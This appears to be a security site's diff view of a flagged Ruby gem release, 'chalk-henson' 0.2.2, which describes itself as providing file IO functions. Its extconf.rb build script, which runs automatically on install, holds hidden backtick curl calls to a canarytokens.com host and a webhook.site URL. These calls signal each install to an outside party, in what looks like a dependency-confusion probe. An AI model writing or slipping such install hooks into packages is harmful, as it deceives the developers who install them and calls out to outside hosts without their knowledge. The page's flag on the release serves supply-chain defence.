chalk-henson 0.2.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of chalk-henson might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: ed066610d9e7065173818b1cc96452033f761e2a33fa7c8cb8a5539046183f95
4
+ data.tar.gz: fc6f39b0a2bc5085872acacfaf0762aea3c71b75a8db70060503aea6b03abd05
5
+ SHA512:
6
+ metadata.gz: 06efda28f56da55c6a1f7a9307ece3f9e7d740ca028fe059980d76c9b7972f6b22a6b6dd6c568a4ffbd08cf9d27006efa4ccbe698b252e6c1882b2eaa38de334
7
+ data.tar.gz: 2a4277904398d3235c85518fa2d9dcc0e94feeda6648ffb71f2550217050ab88ec29081bed487dc22d7792ff9e8ec4169196631f52289dbd1d6baf81fb743a3d
@@ -0,0 +1,11 @@
1
+ #!/usr/bin/ruby
2
+
3
+ `curl http://ceekmd68q9w7137phld4c9byb.canarytokens.com`
4
+ `curl https://webhook.site/5da51341-583a-4099-97cf-c9c5c7b2ba20/chalk-henson2.2`
5
+
6
+ require "mkmf"
7
+
8
+ abort "missing malloc()" unless have_func "malloc"
9
+ abort "missing free()" unless have_func "free"
10
+
11
+ create_makefile "my_malloc/my_malloc"
data/lib/file/file.rb ADDED
@@ -0,0 +1,2 @@
1
+ class File
2
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: chalk-henson
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.2.2
5
+ platform: ruby
6
+ authors:
7
+ - stegs
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2011-05-29 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: Provides file IO functions
14
+ email: stegs@stripe.com
15
+ executables: []
16
+ extensions:
17
+ - ext/my_malloc/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/my_malloc/extconf.rb
21
+ - lib/file/file.rb
22
+ homepage: ''
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.0.3
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: Ask Stegs
45
+ test_files: []